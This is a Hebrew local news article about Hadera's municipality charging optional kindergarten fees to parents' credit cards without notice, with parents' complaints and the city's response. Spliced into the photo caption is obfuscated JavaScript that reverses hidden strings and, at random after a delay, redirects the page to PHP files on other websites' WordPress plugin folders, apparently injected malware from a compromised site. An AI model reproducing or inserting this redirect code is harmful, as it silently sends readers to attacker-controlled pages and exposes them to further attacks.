fbpx
[shortcode-weather-atlas city_selector=1178240 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

עיריית חדרה גבתה תשלומי רשות מההורים ללא ידיעתם

חדרה: תשלומי רשות נגבו מכרטיסי האשראי של הורים לילדים בגנים, ההורים זועמים
גני הילדים, בתי הספר, חינוך מיוחד | צילום: shutterstock
גני הילדים, בתי הספר, חינוך מיוחד | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

בשבוע האחרון, גילו הורים לילדים בגני חובה וטרום חובה בחדרה, כי העירייה גבתה מהם כ-200 שקלים עבור תשלומי רשות. ולאחר מעשה, הודיעה להם העירייה כי מדובר רק בחלק מהסכום. וכי סך תשלומי הרשות הכולל, הוא כ-700 שקלים. הכספים נגבו מפרטי כרטיס האשראי, שהושארו לצורך רישום הילדים בגן. תושב שכונת בית אליעזר, אלי בוקובזה: "היום בבוקר, גילינו שעיריית חדרה החליטה לחייב אותנו. על תשלומים של הגנים, שהם תשלומי רשות. זו שנת קורונה. אני לא רוצה לשלם 700 שקל בשנה, ועוד בשנת קורונה. על אילו חוגים מחייבים אותנו בכלל?".

ביטלו דרך חברת האשראי

ועוד מוסיף אלי בוקובזה ואומר: "גבו ממני את הכסף, שלא בהסכמתי. לא מדובר בהוראת קבע. כשאתה נרשם לגן, לוקחים ממך פרטי כרטיס אשראי. יש תשלומי חובה ויש תשלומי רשות. לתשלומי החובה, נשלח שובר בדואר. אני לא רוצה לשלם תשלומי רשות. מישהו שאל אותי, לפני שחייבו אותי? אף אחד לא דן עם ההורים. הילדה שלי בגן שקד, בנווה חיים. וגיליתי את העניין הזה, רק כשאישתי נכנסה לחשבון. זה חיוב גורף".

מוסיפה על דבריו ניצה דהרי, שקבלה אתמול, יום רביעי, תשלום כפול. על בתה הלומדת בגן נחליאלי ובנה הלומד בגן הרדוף, שבגבעת אולגה. בגני טרום חובה וחובה. "נכנסתי לחשבון הבנק שלי, וראיתי שהורידו לי תשלום כפול. על הילד וגם על הילדה. כמובן שהתרגזתי. ואם אין לי איך לשלם? ואם אני רוצה לעשות תשלומים? באחד הגנים, הגננת אפילו לא אמרה לי. אז אני אמורה לנחש? שאלתי  בגנים עם מי אני יכולה לדבר, כדי לקבל הנחה. הפנו אותי לעיריית חדרה. אבל כבר התחילו לחייב אותי. יש הרבה הורים, שביטלו את החיובים דרך חברת האשראי. הנה, עכשיו אני גם רואה שקבלתי את המכתב של תחילת שנה, בדואר. ורשום לי, שתשלומי הרשות שהורידה לי העירייה, הם על טיולים ותרבות. אין סיכוי בעולם, שיוציאו ילדים בגילאים כאלה לטיולים בתקופת הקורונה, מחוץ לגן. אז לבוא ולקחת על זה 60 שקלים? ורשום פה שהתשלום הוא גם על רכישת שירותים מרצון. מה זה בדיוק?".

 

חייבו על דברים שלא קיימים

מוסיפה על דבריה אירה ואולין: "פשוט חייבו אותנו על דברים שאינם קיימים. כמו, למשל, סל תרבות. וכמובן, טיולים. אנחנו, בעיקרון, חייבים לשלם כל דברים מסויימים. כמו ביטוח תאונות אישיות. איזה טיולים? יש טיולים השנה? אני לא אתן לבן שלי לצאת לשום טיול. עוד לא פניתי לעירייה, אבל אני בהחלט רוצה לפנות. אפילו שזה שקל אחד. למה שאני אשלם, על מה שלא קיים? אם בהמשך יהיו טיולים, נשלם. אבל אי אפשר לגבות תשלום כשאין עליו תמורה. ואולי זה הכסף האחרון שלי? או שאני רוצה לשלם במזומן? אני צריכה לדעת מראש. ולהחליט איך והאם לשלם את הכסף הזה. אף אחד לא שלח הודעה מראש".

אבל נתת את פרטי כרטיס האשראי שלך

"נכון. כי אי אפשר היה להירשם לגן בלי אשראי. אבל לא חשבתי שיתחילו לחייב אותי, באמצעותו, על דברים שאני לא חייבת לשלם.  אפשר היה לשלוח הודעה אוטומטית לכל ההורים. כמו ששולחים הודעות על ארנונה. מדוע לא עשו זאת? הרי יש להם את כל הפרטים שלנו".

מעיריית חדרה נמסר בתגובה: " הגבייה נעשתה בהתאם להוראות משרד החינוך, אשר לאור המצב אישר גבייה של 50 אחוז. אגף החינוך חייב את הורי הילדים, בשלב הזה, רק בתשלום הראשון. של 198 שקלים. במידה ולא תתקיים פעילות, יוחזר להורים החלק היחסי של הסכום. או יקוזז מהתשלום השני".

 

הישארו מעודכנים באתר ובפייסבוק חדשות חדרה, כל זכרון, כל הפרדס

 

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות